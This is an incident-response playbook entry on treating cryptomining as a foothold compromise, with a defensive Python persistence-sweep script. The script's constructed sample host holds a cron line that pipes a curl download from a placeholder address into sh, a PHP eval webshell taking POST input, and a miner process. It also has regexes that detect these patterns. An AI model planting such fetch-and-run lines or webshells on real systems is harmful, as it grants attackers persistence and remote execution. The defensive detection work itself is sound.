Mining Incident Treated as Low Priority by Stakeholders
Stakeholders frame unauthorized mining as "just a resource cost" and push for an immediate process-kill and closure rather than a full investigation. This under-scoping routinely leaves the entry vector open and misses the secondary compromise (webshells, backdoors, credential theft) that the attacker installed alongside the miner.
Signals
- Stakeholder requests to "just kill it and move on" within hours of detection
- Service owners resist a persistence sweep or credential rotation
- No documented plan for entry-vector remediation beyond the compromised host
Pivot Actions
1. Reframe the incident as a foothold compromise, not a resource-theft event: miner deployments are commonly bundled with, or sold alongside, access to the broader compromise
2. Present the specific unknown risks (secondary tooling not yet ruled out, entry vector not yet closed) and the cost of learning the hard way weeks later
3. Insist on a minimum standard of care: persistence sweep, entry-vector closure, credential rotation on exposed accounts
4. Escalate to the CISO or equivalent if local stakeholders continue to block a full investigation
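As an added example (not part of this playbook), the minimum standard of care in step 3 expressed as a triage script: it runs a persistence sweep over artifacts a responder would collect from the affected host (crontab, authorized_keys, process list, webroot files) and maps each finding category back to the action that must be completed before the ticket can close. Every value in SAMPLE_HOST (addresses, key comments, paths, file contents) is constructed, the detection heuristics are deliberately simple, and the "pid exe cmdline" layout of the process list is an assumption about how the collection was done.

```python
"""Persistence-sweep triage for a mining incident (added example, constructed data)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    category: str  # persistence | credential | entry_vector
    source: str    # which collected artifact produced the finding
    detail: str


# Directories a legitimate service rarely executes from; a cron target or a
# running executable under one of these is worth a look (illustrative heuristic).
VOLATILE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# Download-and-pipe-to-shell is a common way a cron entry re-fetches a payload.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# PHP code that hands request input to an execution primitive.
WEBSHELL_HINT = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec)\s*\(.*\$_(GET|POST|REQUEST|COOKIE)", re.S)


def sweep_crontab(lines):
    out = []
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if PIPE_TO_SHELL.search(line) or any(d in line for d in VOLATILE_DIRS):
            out.append(Finding("persistence", "crontab", line.strip()))
    return out


def sweep_authorized_keys(lines, known_comments):
    # Any key whose comment the service owner does not recognise needs revoking
    # and the account it grants needs its credentials rotated.
    out = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        comment = parts[2] if len(parts) > 2 else "<no comment>"
        if comment not in known_comments:
            out.append(Finding("credential", "authorized_keys", f"unrecognised key {comment}"))
    return out


def sweep_processes(lines):
    # Assumed collection format: "<pid> <executable path> <cmdline...>"
    out = []
    for line in lines:
        pid, exe, *_ = line.split(maxsplit=2)
        if exe.startswith(VOLATILE_DIRS):
            out.append(Finding("persistence", "process", f"pid {pid} runs from {exe}"))
    return out


def sweep_webroot(files):
    out = []
    for path, content in files.items():
        if WEBSHELL_HINT.search(content):
            out.append(Finding("entry_vector", "webroot", f"webshell pattern in {path}"))
    return out


def persistence_sweep(host, known_key_comments):
    return (sweep_crontab(host["crontab"])
            + sweep_authorized_keys(host["authorized_keys"], known_key_comments)
            + sweep_processes(host["processes"])
            + sweep_webroot(host["webroot"]))


# The playbook's minimum standard of care, keyed by finding category.
REQUIRED_ACTIONS = {
    "persistence": "remove persistence mechanisms and verify host integrity (or re-image)",
    "credential": "revoke unknown keys and rotate credentials on exposed accounts",
    "entry_vector": "close the entry vector (remove webshell, patch or reconfigure the app)",
}


def remaining_actions(findings):
    """Actions that must be completed before the incident can be closed."""
    cats = {f.category for f in findings}
    return [REQUIRED_ACTIONS[c] for c in ("persistence", "credential", "entry_vector") if c in cats]


# Constructed host artifacts; 198.51.100.0/24 and .invalid are documentation-only names.
KNOWN_KEY_COMMENTS = {"deploy@ci", "alice@laptop"}
SAMPLE_HOST = {
    "crontab": [
        "# m h dom mon dow command",
        "0 3 * * * /usr/bin/certbot renew --quiet",
        "*/5 * * * * curl -fsSL http://198.51.100.7/x.sh | sh",
    ],
    "authorized_keys": [
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyA deploy@ci",
        "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABExampleKeyB x",
    ],
    "processes": [
        "842 /usr/sbin/nginx nginx: worker process",
        "4120 /tmp/.cache/kworker -o pool.example.invalid:3333",
    ],
    "webroot": {
        "/var/www/html/index.php": "<?php echo 'hello'; ?>",
        "/var/www/html/uploads/img.php": "<?php eval(base64_decode($_POST['c'])); ?>",
    },
}

if __name__ == "__main__":
    found = persistence_sweep(SAMPLE_HOST, KNOWN_KEY_COMMENTS)
    for f in found:
        print(f"[{f.category}] {f.source}: {f.detail}")
    print("Still required before closure:", *remaining_actions(found), sep="\n  - ")
```

Killing pid 4120 alone would satisfy none of the three required actions: the cron entry re-fetches the payload, the unknown key keeps the account open, and the upload-directory webshell is the likely entry vector. That gap between "miner killed" and "incident closed" is the argument to put in front of stakeholders.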
Alternate Evidence Sources
- Past peer-organization incidents where under-investigated mining incidents led to major compromise (publicly documented case studies)
- Threat-intel reports on miner families that carry secondary capabilities (Kinsing, Sysrv-hello, LemonDuck)